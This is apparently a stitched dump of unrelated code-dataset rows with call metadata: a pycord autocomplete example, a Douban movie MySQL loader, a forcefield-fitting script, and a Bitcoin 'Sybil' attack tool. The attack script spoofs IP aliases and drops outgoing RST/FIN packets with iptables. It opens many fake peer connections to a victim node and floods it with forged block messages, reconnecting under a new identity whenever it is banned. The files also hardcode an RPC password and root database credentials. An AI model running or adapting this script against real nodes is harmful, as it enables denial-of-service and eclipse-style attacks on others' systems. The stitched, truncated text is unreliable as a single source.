'math.cos', 'cos', ({(30, 21, 30, 24): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((30, 28, 30, 37), 'math.cos', 'cos', ({(30, 32, 30, 36): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((35, 29, 35, 38), 'math.sin', 'sin', ({(35, 33, 35, 37): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((40, 29, 40, 39), 'math.sin', 'sin', ({(40, 33, 40, 38): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((78, 16, 78, 78), 'cv2.rectangle', 'cv2.rectangle', ({(78, 30, 78, 39): 'input_img', (78, 41, 78, 50): '(xw1, yw1)', (78, 52, 78, 61): '(xw2, yw2)', (78, 63, 78, 74): '(0, 0, 255)', (78, 76, 78, 77): '(2)'}, {}), '(input_img, (xw1, yw1), (xw2, yw2), (0, 0, 255), 2)', False, 'import cv2\n'), ((79, 22, 79, 33), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((80, 33, 80, 105), 'cv2.resize', 'cv2.resize', ({(80, 44, 80, 82): 'input_img[yw1:yw2 + 1, xw1:xw2 + 1, :]', (80, 84, 80, 104): '(img_size, img_size)'}, {}), '(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))', False, 'import cv2\n'), ((81, 33, 81, 114), 'cv2.normalize', 'cv2.normalize', (), '', False, 'import cv2\n'), ((83, 23, 83, 61), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((31, 17, 31, 27), 'math.cos', 'cos', ({(31, 21, 31, 26): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((31, 30, 31, 39), 'math.sin', 'sin', ({(31, 34, 31, 38): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((31, 
67, 31, 75), 'math.sin', 'sin', ({(31, 71, 31, 74): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((35, 18, 35, 26), 'math.cos', 'cos', ({(35, 22, 35, 25): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((36, 17, 36, 27), 'math.cos', 'cos', ({(36, 21, 36, 26): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 30, 36, 39), 'math.cos', 'cos', ({(36, 34, 36, 38): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((36, 66, 36, 75), 'math.sin', 'sin', ({(36, 70, 36, 74): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((40, 18, 40, 26), 'math.cos', 'cos', ({(40, 22, 40, 25): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((62, 47, 62, 73), 'numpy.array', 'np.array', ({(62, 56, 62, 72): '[w0, h0, w0, h0]'}, {}), '([w0, h0, w0, h0])', True, 'import numpy as np\n'), ((31, 42, 31, 51), 'math.cos', 'cos', ({(31, 46, 31, 50): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((31, 54, 31, 64), 'math.sin', 'sin', ({(31, 58, 31, 63): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 42, 36, 52), 'math.sin', 'sin', ({(36, 46, 36, 51): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 55, 36, 63), 'math.sin', 'sin', ({(36, 59, 36, 62): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((85, 34, 85, 45), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Mihitoko/pycord | examples/app_commands/slash_autocomplete.py | 137c1474eed5fb4273e542bd22ad76764a8712fc | import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| [((4, 6, 4, 37), 'discord.Bot', 'discord.Bot', (), '', False, 'import discord\n'), ((132, 1, 132, 70), 'discord.commands.option', 'option', (), '', False, 'from discord.commands import option\n'), ((133, 1, 133, 74), 'discord.commands.option', 'option', (), '', False, 'from discord.commands import option\n'), ((157, 17, 157, 65), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', ({(157, 50, 157, 64): 'color_searcher'}, {}), '(color_searcher)', False, 'import discord\n'), ((163, 17, 163, 89), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', ({(163, 50, 163, 88): "['snail', 'python', 'cricket', 'orca']"}, {}), "(['snail', 'python', 'cricket', 'orca'])", False, 'import discord\n')] |
simewu/bitcoin_researcher | tools/Networking/sybil_block_no_ban.py | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds between attack packets
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
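	# Assemble a syntactically plausible 'block' message by hand: random previous-block
	# and merkle-root hashes, the current timestamp, a random nonce, no transactions,
	# and a deliberately random checksum instead of the real double-SHA256 digest.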
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send block messages repeatedly until the peer bans/drops the connection, then reconnect with a new identity
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
		network_info = None  # json.loads(bitcoin('getnetworkinfo')) disabled; the hard-coded defaults above are used
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backup of the iptables rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptables rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| [((20, 3, 20, 15), 'os.geteuid', 'os.geteuid', ({}, {}), '()', False, 'import os\n'), ((21, 1, 21, 121), 'sys.exit', 'sys.exit', ({(21, 10, 21, 120): '"""\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""'}, {}), '(\n """\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""\n )', False, 'import sys\n'), ((100, 10, 100, 32), 'random.getrandbits', 'random.getrandbits', ({(100, 29, 100, 31): '32'}, {}), '(32)', False, 'import random\n'), ((101, 7, 111, 2), 'bitcoin.core.CBlock', 'CBlock', (), '', False, 'from bitcoin.core import CBlock\n'), ((113, 5, 113, 15), 'io.BytesIO', '_BytesIO', ({}, {}), '()', True, 'from io import BytesIO as _BytesIO\n'), ((141, 1, 141, 15), 'socket.close', 'socket.close', ({}, {}), '()', False, 'import socket\n'), ((152, 12, 152, 39), 'random.randint', 'random.randint', ({(152, 27, 152, 31): '1024', (152, 33, 152, 38): '65535'}, {}), '(1024, 65535)', False, 'import random\n'), ((169, 5, 169, 54), 'socket.socket', 'socket.socket', ({(169, 19, 169, 33): 'socket.AF_INET', (169, 35, 169, 53): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((281, 4, 281, 38), 'os.path.exists', 'os.path.exists', ({(281, 19, 281, 37): 'iptables_file_path'}, {}), '(iptables_file_path)', False, 'import os\n'), ((318, 1, 318, 26), 'atexit.register', 'atexit.register', ({(318, 17, 318, 25): 'on_close'}, {}), '(on_close)', False, 'import atexit\n'), ((176, 2, 176, 15), 'time.sleep', 'time.sleep', ({(176, 13, 176, 14): '(1)'}, {}), '(1)', False, 'import time\n'), ((210, 2, 217, 4), '_thread.start_new_thread', 'start_new_thread', ({(210, 19, 210, 25): 'attack', (210, 27, 210, 29): '()', (210, 31, 217, 3): "{'socket': s, 'src_ip': src_ip, 'src_port': src_port, 'dst_ip': dst_ip,\n 'dst_port': dst_port, 'interface': interface}"}, {}), "(attack, (), {'socket': s, 'src_ip': src_ip, 'src_port':\n src_port, 'dst_ip': dst_ip, 'dst_port': dst_port, 'interface': interface})", False, 'from _thread import start_new_thread\n'), ((248, 2, 248, 12), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((257, 2, 257, 12), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((284, 2, 284, 31), 'os.remove', 'os.remove', ({(284, 12, 284, 30): 'iptables_file_path'}, {}), '(iptables_file_path)', False, 'import os\n'), ((300, 2, 300, 16), 'socket.close', 'socket.close', ({}, {}), '()', False, 'import socket\n'), ((333, 2, 333, 16), 'time.sleep', 'time.sleep', ({(333, 13, 333, 15): '(60)'}, {}), '(60)', False, 'import time\n'), ((49, 40, 49, 51), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((53, 8, 53, 21), 'os.popen', 'os.popen', ({(53, 17, 53, 20): 'cmd'}, {}), '(cmd)', False, 'import os\n'), ((57, 8, 57, 352), 'os.popen', 'os.popen', ({(57, 17, 57, 351): "('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)"}, {}), "(\n './../../src/bitcoin-cli -rpcuser=cybersec 
-rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)", False, 'import os\n'), ((97, 27, 97, 48), 'random.getrandbits', 'random.getrandbits', ({(97, 46, 97, 47): '8'}, {}), '(8)', False, 'import random\n'), ((98, 28, 98, 49), 'random.getrandbits', 'random.getrandbits', ({(98, 47, 98, 48): '8'}, {}), '(8)', False, 'import random\n'), ((123, 18, 123, 39), 'random.getrandbits', 'random.getrandbits', ({(123, 37, 123, 38): '(8)'}, {}), '(8)', False, 'import random\n'), ((226, 3, 226, 46), 'time.sleep', 'time.sleep', ({(226, 14, 226, 45): 'seconds_between_version_packets'}, {}), '(seconds_between_version_packets)', False, 'import time\n'), ((228, 3, 228, 21), 'socket.send', 'socket.send', ({(228, 15, 228, 20): 'block'}, {}), '(block)', False, 'import socket\n'), ((68, 30, 68, 67), 'random.randint', 'random.randint', ({(68, 45, 68, 61): 'minimum_ip_range', (68, 63, 68, 66): '255'}, {}), '(minimum_ip_range, 255)', False, 'import random\n'), ((99, 14, 99, 37), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((99, 40, 99, 69), 'datetime.datetime', 'datetime.datetime', ({(99, 58, 99, 62): '1970', (99, 64, 99, 65): '1', (99, 67, 99, 68): '1'}, {}), '(1970, 1, 1)', False, 'import datetime\n')] |
aloneZERO/douban-movie-visualization | spider/db.py | 8e59c4d0b00df1b240a5dce09093ae4984fd7118 | #!python3
'''
Database operations class
author: justZero
email: [email protected]
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='root',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
    def close(self):
        # Close the cursor first, then the connection that owns it.
        self.cursor.close()
        self.conn.close()
    # Batch insert helper
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
    # Insert movie records
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
    # Insert aggregated rating statistics
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| [((55, 16, 55, 47), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((22, 20, 29, 67), 'pymysql.connect', 'pymysql.connect', (), '', False, 'import pymysql\n'), ((56, 13, 56, 32), 'numpy.array', 'np.array', ({(56, 22, 56, 31): 'movies_df'}, {}), '(movies_df)', True, 'import numpy as np\n')] |
sctiwari/EZFF_ASE | examples/rxff-serial/run.py | 94710d4cf778ff2db5e6df0cd6d10d92e1b98afe | import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
    except Exception:  # 'pool' only exists when running under MPI; fall back to a serial path
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| [((5, 8, 5, 58), 'ezff.interfaces.qchem.read_structure', 'qchem.read_structure', ({(5, 29, 5, 57): '"""ground_truths/optCHOSx.out"""'}, {}), "('ground_truths/optCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((6, 15, 6, 62), 'ezff.interfaces.qchem.read_energy', 'qchem.read_energy', ({(6, 33, 6, 61): '"""ground_truths/optCHOSx.out"""'}, {}), "('ground_truths/optCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((7, 10, 7, 61), 'ezff.interfaces.qchem.read_structure', 'qchem.read_structure', ({(7, 31, 7, 60): '"""ground_truths/scanCHOSx.out"""'}, {}), "('ground_truths/scanCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((8, 17, 8, 65), 'ezff.interfaces.qchem.read_energy', 'qchem.read_energy', ({(8, 35, 8, 64): '"""ground_truths/scanCHOSx.out"""'}, {}), "('ground_truths/scanCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((49, 9, 49, 68), 'ezff.read_variable_bounds', 'ezff.read_variable_bounds', (), '', False, 'import ezff\n'), ((50, 11, 50, 52), 'ezff.read_forcefield_template', 'ezff.read_forcefield_template', ({(50, 41, 50, 51): '"""template"""'}, {}), "('template')", False, 'import ezff\n'), ((52, 10, 52, 124), 'ezff.OptProblem', 'ezff.OptProblem', (), '', False, 'import ezff\n'), ((53, 12, 53, 62), 'ezff.Algorithm', 'ezff.Algorithm', (), '', False, 'import ezff\n'), ((54, 0, 54, 49), 'ezff.optimize', 'ezff.optimize', (), '', False, 'import ezff\n'), ((18, 16, 18, 37), 'ezff.interfaces.gulp.job', 'gulp.job', (), '', False, 'from ezff.interfaces import gulp, qchem\n'), ((20, 27, 20, 84), 'ezff.generate_forcefield', 'ezff.generate_forcefield', (), '', False, 'import ezff\n'), ((32, 18, 32, 39), 'ezff.interfaces.gulp.job', 'gulp.job', (), '', False, 'from 